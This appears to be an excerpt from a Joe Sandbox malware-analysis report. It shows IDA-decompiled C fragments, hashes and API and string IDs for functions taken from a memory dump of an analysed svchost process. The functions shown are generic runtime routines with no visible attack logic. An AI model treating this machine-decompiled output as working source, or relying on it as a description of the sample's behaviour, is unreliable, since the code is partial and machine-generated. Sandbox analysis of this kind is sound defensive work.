                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileHandleType
                                                            • String ID: @
                                                            • API String ID: 3000768030-2766056989
                                                            • Opcode ID: 0f4aef228be69e172ae416511e9806d5c0d4549bee0373b76541760fbcab3704
                                                            • Instruction ID: c3c87713042489c1957615b32939dab8f0adc045cb5f40c89d80a394883d486c
                                                            • Opcode Fuzzy Hash: 0f4aef228be69e172ae416511e9806d5c0d4549bee0373b76541760fbcab3704
                                                            • Instruction Fuzzy Hash: 1F21E423E04B5050EF768B65949C2A8B792F745B74F2A1706D6AB077D6EF36C881C341
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0000022B22BAF540A30(long long __rbx, intOrPtr* __rcx, long long _a8) {
                                                            				void* _t13;
                                                            
                                                            				_a8 = __rbx;
                                                            				if ( *__rcx != 0) goto 0xaf540a58;
                                                            				 *((intOrPtr*)(__rcx + 0x44)) = 0;
                                                            				_t3 = _t13 + 1; // 0x1
                                                            				return _t3;
                                                            			}




                                                            0x22baf540a30
                                                            0x22baf540a45
                                                            0x22baf540a47
                                                            0x22baf540a4a
                                                            0x22baf540a57

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandleObjectSingleWait
                                                            • String ID: stop
                                                            • API String ID: 528846559-3109426870
                                                            • Opcode ID: ed094be8e1d8f543187a9199dca0b8fa8d8bc45c90499c530f4b7d04cc568f2e
                                                            • Instruction ID: 80474075e07656471ab58f41daa7cfb4f3bab5a3c0405e1cc84f9d2d096d1475
                                                            • Opcode Fuzzy Hash: ed094be8e1d8f543187a9199dca0b8fa8d8bc45c90499c530f4b7d04cc568f2e
                                                            • Instruction Fuzzy Hash: 5A1151336016009AEF66CF9AE55C39877E1EB88B98F285515DA1D47796EF3AC481C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 50%
                                                            			E0000022B22BAF56FC4C(void* __eflags, long long* __rax, long long __rbx, void* __rcx, long long _a8) {
                                                            				void* _t4;
                                                            				long long* _t8;
                                                            				void* _t18;
                                                            
                                                            				_t8 = __rax;
                                                            				_a8 = __rbx;
                                                            				E0000022B22BAF56F93C(0xf, __rcx, "GetSystemTimePreciseAsFileTime", _t18, "\t", "GetSystemTimePreciseAsFileTime");
                                                            				if (_t8 == 0) goto 0xaf56fc90;
                                                            				E0000022B22BAF57BC88();
                                                            				_t4 =  *_t8();
                                                            				goto 0xaf56fc99;
                                                            				GetSystemTimeAsFileTime(??);
                                                            				return _t4;
                                                            			}






                                                            0x22baf56fc4c
                                                            0x22baf56fc4c
                                                            0x22baf56fc73
                                                            0x22baf56fc7e
                                                            0x22baf56fc83
                                                            0x22baf56fc8c
                                                            0x22baf56fc8e
                                                            0x22baf56fc93
                                                            0x22baf56fca3

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Time$FileSystem
                                                            • String ID: .exe$GetSystemTimePreciseAsFileTime
                                                            • API String ID: 2086374402-666196055
                                                            • Opcode ID: 1885f2c5727bae0480385e8a400f87ee5cfadcaa6b150fcb2e7c33bd803b9c5e
                                                            • Instruction ID: 163c2d66392a14cd51ebe49d322d304760fb21870917c72c669a7e2fd97e1080
                                                            • Opcode Fuzzy Hash: 1885f2c5727bae0480385e8a400f87ee5cfadcaa6b150fcb2e7c33bd803b9c5e
                                                            • Instruction Fuzzy Hash: 53F06522A14B46B1FE669BD6F80C2F83390AB44BC0F4854319D160675BEF39C4449380
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileMovelstrlen
                                                            • String ID: r
                                                            • API String ID: 3773443382-1812594589
                                                            • Opcode ID: 8a35fc9d402d0e343fb9d254ae2f6c619980153bb64365810d880690ea30e486
                                                            • Instruction ID: b90422518d6687850ac7d3a97a2778a421f0eb2e0101e2758caac76e7f02ef73
                                                            • Opcode Fuzzy Hash: 8a35fc9d402d0e343fb9d254ae2f6c619980153bb64365810d880690ea30e486
                                                            • Instruction Fuzzy Hash: D7E09262704A80A2DB119F19E04C2D9B771F785BC5F584521DB490762AEF7EC1948710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 40%
                                                            			E0000022B22BAF55B394(void* __eflags, void* __rax) {
                                                            				char _v40;
                                                            				void* _t6;
                                                            				void* _t9;
                                                            				void* _t13;
                                                            				char* _t15;
                                                            				void* _t17;
                                                            
                                                            				E0000022B22BAF55B308(__rax,  &_v40);
                                                            				_t15 =  &_v40;
                                                            				_t6 = E0000022B22BAF563744(_t13, _t15, 0xaf5921f8, _t17);
                                                            				asm("int3");
                                                            				_t12 =  !=  ?  *((void*)(_t15 + 8)) : "Unknown exception";
                                                            				_t9 =  !=  ?  *((void*)(_t15 + 8)) : "Unknown exception";
                                                            				return _t6;
                                                            			}









                                                            0x22baf55b39d
                                                            0x22baf55b3a9
                                                            0x22baf55b3ae
                                                            0x22baf55b3b3
                                                            0x22baf55b3c0
                                                            0x22baf55b3c0
                                                            0x22baf55b3c5

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                            • String ID: Unknown exception
                                                            • API String ID: 3561508498-410509341
                                                            • Opcode ID: 0dba5c35c4838d5003245c0f8c01933027e72927b9035dea4e9d0a86b65c51a1
                                                            • Instruction ID: 65ef99f2cfd66ebaf7b998c2bbc460fbe207d3e08e538e6ac3afc5b6d8c142ad
                                                            • Opcode Fuzzy Hash: 0dba5c35c4838d5003245c0f8c01933027e72927b9035dea4e9d0a86b65c51a1
                                                            • Instruction Fuzzy Hash: 4AD05E23214A88B1DE21DB84D88C3C87330F780308F904412925C815B7DF3AC64BE740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 39%
                                                            			E0000022B22BAF552AF0(void* __ebp, void* __eflags, void* __rax, long long __rbx, intOrPtr* __rcx, long long __rsi, long long __rbp, char _a8, long long _a16, long long _a24, long long _a32) {
                                                            				void* __rdi;
                                                            				void* _t28;
                                                            				void* _t41;
                                                            				intOrPtr* _t44;
                                                            
                                                            				_t46 = __rbp;
                                                            				_t28 = __rax;
                                                            				_a16 = __rbx;
                                                            				_a24 = __rbp;
                                                            				_a32 = __rsi;
                                                            				_t44 = __rcx;
                                                            				_a8 = 0;
                                                            				_t30 = __rcx + 0x98;
                                                            				E0000022B22BAF551A10(__rcx + 0x98, __rcx, __rcx, __rbp);
                                                            				_t41 = _t28;
                                                            				if (_t28 == 0) goto 0xaf552b8c;
                                                            				asm("o16 nop [eax+eax]");
                                                            				if (E0000022B22BAF552C30(_t30, _t44, _t41, _t41, _t44, _t46,  &_a8) == 0) goto 0xaf552c03;
                                                            				if (_a8 != 0) goto 0xaf552ba6;
                                                            				if (_t41 == 0) goto 0xaf552b75;
                                                            				if (E0000022B22BAF54FD40(_t30, _t30 + 0x30, _t41) != 0) goto 0xaf552b75;
                                                            				HeapFree(??, ??, ??);
                                                            				E0000022B22BAF551A10(_t44 + 0x98, _t44, _t44, _t46);
                                                            				if (_t28 != 0) goto 0xaf552b30;
                                                            				return 1;
                                                            			}







                                                            0x22baf552af0
                                                            0x22baf552af0
                                                            0x22baf552af0
                                                            0x22baf552af5
                                                            0x22baf552afa
                                                            0x22baf552b04
                                                            0x22baf552b07
                                                            0x22baf552b0f
                                                            0x22baf552b16
                                                            0x22baf552b1b
                                                            0x22baf552b21
                                                            0x22baf552b27
                                                            0x22baf552b42
                                                            0x22baf552b4d
                                                            0x22baf552b52
                                                            0x22baf552b62
                                                            0x22baf552b6f
                                                            0x22baf552b7f
                                                            0x22baf552b8a
                                                            0x22baf552ba5

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                            • String ID:
                                                            • API String ID: 1701177279-0
                                                            • Opcode ID: 71c6565e52991c1ceb2f7f853c1f0e4a0813fade0213b6da4b33164cba8b6a2a
                                                            • Instruction ID: 816aaabf80b98f0c269d0f45a297d05cb7b298d37620e100d607e7d82be5af76
                                                            • Opcode Fuzzy Hash: 71c6565e52991c1ceb2f7f853c1f0e4a0813fade0213b6da4b33164cba8b6a2a
                                                            • Instruction Fuzzy Hash: 5D313933205A40A2EB668BA2E58C3EEB3A1F788BD4F444411DF5A47B97DF3AC555C340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%